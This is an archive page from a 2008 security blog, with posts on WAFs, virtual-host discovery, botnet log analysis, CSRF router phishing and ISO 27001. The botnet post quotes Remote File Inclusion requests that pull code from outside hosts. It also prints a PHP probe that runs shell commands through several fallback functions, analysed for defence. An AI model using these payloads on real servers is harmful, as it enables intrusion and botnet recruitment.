Archive for January, 2008

Yes, it is…

January 31, 2008

Recently I wrote about the issues I have with web application firewalls. However today I’d like to give a short shout-out to the ModSecurity Blog and its newest article “Is Your Website Secure?“.

I like the message of the article so much, that I’ll just cite the according section:

[…] one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall and log analysis does not adequately ensure “security.” While each of these tasks excel in some areas and aid in the overall security of a website, they are each also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly “defensible web application.”

I do think that some of the activities mentioned above are more effective (and therefore important) than others, but generally, I couldn’t agree more. Very well put Ryan Barnett, thanks!

Picture of scary spider in its web by Vanessa Pike-Russell

Finding Virtualhosts

January 29, 2008

Web applications are often the most vulnerable of all applications in an IT infrastructure, as they are

  • often proprietary built by the company, and therefore have not undergone the security tests that might have been performed with standard software and are
  • reachable from the Internet, so anyone with an Internet connection can access them.

Additionally, more than one domain can be served from a single web server. Each domain is then considered a virtualhost.

It’s sometimes really difficult to find all domains that are served from an IP address, as there is no way in DNS to find out all domains that point to a certain IP. For an attacker or penetration tester, it is important to find as many virtualhosts as possible, as each one might contain vulnerabilities of their own.

The only way to do this is to build a large database with as many domain names as possible, complete with the IP address that these domain names point to. Luckily, there are a couple of tools that have done exactly that:

  • YouGetSignal.com seems to be the newest tool and works pretty well. I did a couple of tests and it finds not only virtualhosts for .net, .com or .org, but also for local TLDs like .co.uk. According to the author of the tool, it simply uses search engine results to find as many domains as possible and performs DNS queries for them.
  • Robtex Swiss Army Knife as they call themselves also can help to find virtualhosts, but the results are a little bit limited and partly out of date.

Picture of IT infrastructure where you literary have to find the web-server by kchbrown

Analyzing Bot Networks

January 27, 2008

If you operate a web server, do you have a look at your log files from time to time? If yes, chances are good that you see strange requests with URLs as GET parameters. I checked my log file and copied a couple of these requests:

GET /?name=PNphpBB2&highlight= %2527.include($_GET[a]),exit.%2527&a= http://party4you.ch/new/id.txt?
GET /classes/dcomp.php?include_path= http://www.gumgangfarm.com/shop/data/id.txt?
GET /wing-calendar/send_reminders.php?includedir= http://laformigueta.com/1?/

Most of these requests either originate from worms who are trying to propagate themselves, or – like the ones above – from bots, who are also trying to find new members for their army. If you want to quickly find them in the log of your web-server, simply grep for libwww, as most of them use “libwww-perl/x.xx” as UserAgent.

What these requests try to exploit is a vulnerability called Remote File Inclusion. It works if two conditions are met:

  • Unvalidated user input must be used in an include* or require* PHP function.
  • The PHP configuration setting allow_url_fopen must be set to “on”. By default, this is not the case in PHP v5.

If the attacker succeeds in getting the vulnerable PHP script to include the URL defined as HTTP parameter, it is automatically loaded and executed by PHP. Let’s have a look at the source code that is injected. I just visited http://www.doblepenalti.com/web/components/id.txt (I won’t link it – the server is currently a member of a bot network and I have no idea how long this will be the case. Changes are the operators will get a clue sometime and the link won’t work any longer) and copied the content of the file here:

010: <?php
020: echo "Mic22";
030: $cmd="id";
040: $eseguicmd=ex($cmd);
050: echo $eseguicmd;
060: function ex($cfe){
070: $res = '';
080: if (!empty($cfe)){
090: if(function_exists('exec')){
110: @exec($cfe,$res);
120: $res = join("\n",$res);
130: }
140: elseif(function_exists('shell_exec')){
150: $res = @shell_exec($cfe);
160: }
170: elseif(function_exists('system')){
180: @ob_start();
190: @system($cfe);
200: $res = @ob_get_contents();
210: @ob_end_clean();
220: }
230: elseif(function_exists('passthru')){
240: @ob_start();
250: @passthru($cfe);
260: $res = @ob_get_contents();
270: @ob_end_clean();
280: }
290: elseif(@is_resource($f = @popen($cfe,"r"))){
300: $res = "";
310: while(!@feof($f)) { $res .= @fread($f,1024); }
320: @pclose($f);
330: }}
340: return $res;
350: }
360: exit;

I added line numbers in order to make it easier to describe the code. Actually it’s pretty simple. All it does is try to execute the command “id”. To achieve this, it tries different functions that allow the execution of commands. These are exec (line 110), shell_exec (line 150), system (190), passthru (line 250) and finally popen (line 290). It probably does that because some web server administrators block php functions that may be used to execute commands, but very often one or more are forgotten.

The output of the id command is simply printed as output (line 050). The bot that sent out the probe checks if the script returns anything behind “Mic22” (line 020) and knows if it succeeded. If yes, it will install the bot software on the vulnerable web server.

Actually, this is already an improvement against older bot versions. They used to include the complete bot code. This allowed anybody who checks his log to analyze the code. It also contained the IRC servers and channels from where the bot is controlled. Unfortunately, my web server does not have many hits, so I can’t find the source of such a complete bot. I’ll see if I can find one somewhere and post it here.

Wiretapping Skype

January 25, 2008

The government of Bavaria in Germany leaked a letter (only available in German) describing in detail plans for wiretapping Internet telephony (in particular Skype) of private residents.

Apparently a company has been contracted to write a Trojan that can either be installed by police officers who enter the domicile to set up physical wiretaps or via email. Ok, this won’t probably work for you guys who read this blog, but most people click on anything that moves. And who has an encrypted hard disk at home?

What strikes out are the costs for the Trojan. It only costs EUR 3 500.- (approximately $ 5 100.-) per month and person under surveillance. The reasoning is that this can only be worth it’s while for the company supporting the software, if its used often. I’m not so sure about this. It should be possible to create a quick and dirty Skype Trojan within a week. In the letter they speak about some advanced features like online update and removal or file transfer to servers out of Germany. This would take a little longer to implement, but not too long. If I were them instead of attacking Skype, I’d rather just grab microphone input and speaker output. This would allow to wiretap the room, and would also work with other VoIP programs.

It probably won’t take long until Germany is another black country on the map.

Picture of phone equipment by peterkaminski

Tide Out for Web Application Firewalls

January 23, 2008

I recently stumbled across an article by Ivan Ristic who also writes for the ModSecurity Web Security Blog. It’s about how 2008 is finally going to become the year of Web Application Firewalls.

I really hate to be a spoilsports, but I’m afraid it’s still a long time until we have such a thing as the Year of WAFs. I’ve never been a huge fan of such firewalls and for a reason. I’ll use the following posting to tell you why I feel this way.

While I think that e.g. ModSecurity can increase the security by some, the dangers IMHO out-weight the gains. Here is my reasoning:

  • Web Application Firewalls give companies a false sense of security. As opposed to normal network firewalls, where people know exactly that such devices keep traffic from going to certain ports, however let traffic to other ports pass, it is impossible to know the vulnerabilities that can or cannot be prevented with a WAF in front of an application. Many instances of SQL Injection or Cross-Site Scripting will be detected, but others will fall through the cracks. I’d rather know that I have lots of SQL Injections in my application than think it is secure when it in fact has a few exploitable flaws.
  • Many critical vulnerability classes can not be detected and prevented at all. Flaws in the logic of an application, or Cross-Site-Request Forgery vulnerabilities (which get more interesting by the minute) can be exploited even with a WAF in front of the application. This, in connection with the false sense of security matter mentioned above can be a problem, even though I admit it is a weak argument not to use WAFs just because they don’t protect against certain attacks.
  • They increase the attack surface by adding a new layer. While ModSecurity seems to have a pretty clean vulnerability record, this does not hold true for other Web Application Firewalls. In any case, they do add a layer of complexity and therefore also bear the risk of introducing new vulnerabilities. In fact, I’ve seen WAFs that were more easily hacked than the application they was supposed to protect.
  • False positives can cause the protected application to stop working. WAFs come with a huge number of default configurations. However many are not context sensitive and those who are can often be tricked. Take the word Union for example. It might either be used by an attacker exploiting an SQL Injection vulnerability, or by a valid user posting a comment about the European Union. Another example is a forum that allows certain HTML-tags for postings. The default configuration will break the complete forum functionality. Companies using WAFs to protect huge applications need to put a whole lot of work into testing if their web applications still work in boundary conditions after installment.

So, to sum it up, I think it is indeed possible to protect web applications from some attacks by WAFs. However it takes a lot of work to correctly configure the product and make it a fit to the application. More importantly, correctly configuring it requires to know the vulnerabilities to protect from. Once the vulnerabilities are known, it’s almost always more effective to patch the code instead of putting a WAF in front of it (there are some cases where this might not be true, e.g. when only the binary code is available and the manufacture cannot be squeezed to fix the flaws).

My appeal is to please, please Web application developers: Start to write secure code. It’s not that hard! Have a look at the Open Web Application Security Project (OWASP) Guide. It is a great starter into the world of secure development.

Picture of Lego-Firewall by ianlloyd

Phishing over CSRF

January 23, 2008

In my posting CSRF: And Go it Does, I wrote about a recently discovered Cross-Site-Request Forgery vulnerability in Linksys WLAN routers. To cite myself:

However I agree that this is not the most critical vulnerability. How many people are permanently logged into their WLAN router?

I’m still aware that not many people will be permanently logged onto their router, however the bad guys are once again one step ahead. They thought of a way to exploit the flaw that is – I have to admit – ingenious. Absolutely ingenious. Basically, using the flaw any setting on the router can be changed. This also holds true for the DNS settings of course. So what they did is they used CSRF to change the DNS server of any router whose logged-in administrator happened to surf on a page that contained the CSRF code.

The DNS server they used resolved the domain name of a Mexican bank to the IP of a phishing server. So next time you enter the URL to your online banking application, you should check the SSL certificate (you should always do that anyway). While we security guys are aware of such attacks, I’m sure 99% of online banking users are not.

So, as I predicted, once againĀ  an amazing use of Cross-Site-Request Forgery. I’m sure there’s still a lot more to come!

Picture of Phishing Nets being thrown out at sunset by ezee123

ISO 27001 – The Good and the Bad (Part III)

January 21, 2008

I have no idea why, but my posts about ISMS are those that get by far the most hits. So I’ll continue the series ISO 27001 – The Good and the Bad (here are the links to Part I and Part II) with the topic I already mentioned yesterday: Measuring the effectiveness of controls.

The corresponding requirement can be found in clause ISO 27001:2005 4.2.2d. In the words of the standard, it sounds like this:

Define how to measure the effectiveness of the […] controls […] and specify how these measurements are to be used to assess control effectiveness to produce comparable and reproducible results […].

Ted Humphreys himself said that the requirement is not very clear. First off, it is important to note that this is one of three control mechanisms. The first is the internal auditing and management reviewing that is required by the standard. The second is the incident management that must be implemented and used to identify potential vulnerabilities and close them via corrective and preventive actions.

We’re talking about the third one: Measuring the effectiveness of controls. Let’s go through the clause word by word. The first thing that sicks out is that there is no limiting element in there. In theory you’d need to measure the effectiveness of each and every control you implemented in your ISMS. While measuring the performance of technical measures is not easy but at least doable by specifying key figures, measuring the performance of organizational controls is outright impossible. How are you supposed to find out how effective your security policy is? In a way that is reproducible? Forget it! What about screening? The only thing you can find out is when it was not effective. But by then it will be too late.

While I think the requirement itself does make sense, I would expect some guideline for which controls the measurement must be implemented. Doing all controls is definitely impossible.

The second thing which in my humble opinion is unclear is how to measure the effectiveness. Using key figures is just a guess from my side. The auditor I accompanied a couple of months ago seemed to have the same opinion. It would definitely help to if they included just a sentence with some guidance.

This guidance is going to be provided by a standard of its own, ISO 27004. The only problem is that it is still not available. Some people expect it to become available this year, but I personally think it won’t be released until 2009 (though I hope I’m wrong). However what is available today is the BIP 0074:2006 standard. It’s called “Measuring the effectiveness of your ISMS implementations based on ISO/IEC 27001”. ISO 27004 can be expected to be based on the BIP book. Unfortunately I did not yet have the chance to read it. If I can get hold of a copy, I’ll post an article about it here.

Alright, it’s become quite a long article. I’ll call it a day. If I forgot anything, please drop me a line in the comments section. Thanks!

Picture of an object of which I have no idea what it is, but which must have something to do with measuring by spacesuitcatalyst

RIAA Hacked

January 20, 2008

Funny thing: The RIAA apparently got hacked. The attackers used an SQL Injection vulnerability to manipulate the database. I never cease to be amazed how easy it is to find such flaws in web applications.

I have no idea what used to be on the news room page, but an SQL Injection can’t do this. Either someone found something a lot worse (or better, depending on your point of view), or the RIAA did this to themselves.

While I’m writing this, it sounds like a great conspiracy theory. The RIAA hacks itself in order to proof that people who share music are indeed criminals ;).

While I’m at it, this is not the first time that companies enforcing IP or connected to such companies got hacked. A group of guys seem to have stolen and leaked emails from MediaDefender for example. Not quite a hack, but also interesting is the fact that IFPI obviously forgot to renew their domain registration and the pirates took them gladly.

[Update: The RIAA seems to have fixed the issue, so I updated the old links to a screenshot I took while the page was still offline]

Picture of Pirate Eye by Cayusa

Move to WordPress

January 20, 2008

Recently I’ve moved this blog from Blogger to WordPress. This is why the newer posts look a little bit different from the older ones. The reason for the move was that WordPress offers some features that Blogger currently does not have. As my blog did not have any visitors anyway, it didn’t matter much. It’s not like I would have broken links.

Anyways, there’s an interesting and funny feature I discovered in WordPress. It’s the Tag Surfer. This is interesting for a couple of reasons. On the one hand, it tells you what people are currently blogging about. The first couple of tags are probably pretty static. Like Life, News, Politics, Music, Sex etc. However there are also some tags that reflect the current interest of today.

On the other hand, it’s great fun to find blogs that write about similar things as you do. Obviously, apart from me there are not many people on WordPress writing about CSRF, ISO 27001 or PortBunny. More general terms like Security yield more results. While there’s a lot of rubbish, you can discover some great blogs similar to yours. It’s definitely easier than just looking through the latest postings.

Picture of Web 2.0 logos by Stabilo Boss

ISO/IEC 27001:2009 and ISO/IEC 27002:2009

January 20, 2008

I’ve recently had the chance to hear a talk by Ted Humphreys, who – as editor of BS 7799-1:1999 and ISO 17799:2000 – was one of the fathers of ISO 27001:2005 and ISO 27002:2005. He is also the founder and director of http://www.iso27001certificates.com, the international ISMS certificates register.

While the talk itself was not much news, at the end Humphreys spoke about updates to the standard. According to him, a review cycle is going to start this April for both ISO 27001:2005 and ISO 27002:2005 (you know, formerly ISO17799:2005). A revised standard can be expected for 2009.

In particular in 17799 they are looking to add new controls. Input is gathered from practically any national standardization body. So if you got ideas for new controls this is where to bring them. What in my opinion is a little bit of a pity is that they are currently not thinking of dropping any of the existing controls. Things like limitation of connection time just don’t work against modern threats any more, in my humble opinion.

The management system itself, ISO 27001, according to Humphreys is not going to be changed a lot. At the moment there are no plans for new requirements. They have had some input regarding ambiguous or unclear clauses. Interestingly, one thing they want to clarify is the requirement to measure the effectiveness of selected controls. I still did not get around writing the third part of my ISO 27001 – The Good and the Bad Series (see Part I and Part II), but the topic was going to be this exact clause of the standard. It’s great that they want to clarify it in the next revision.

So, to sum it up, while in ISO 27001:2009 there will be only minor adjustments, we can expect lots of new controls in ISO 27002:2009. I can’t wait for it!

Picture of Bragging Wall by Beth77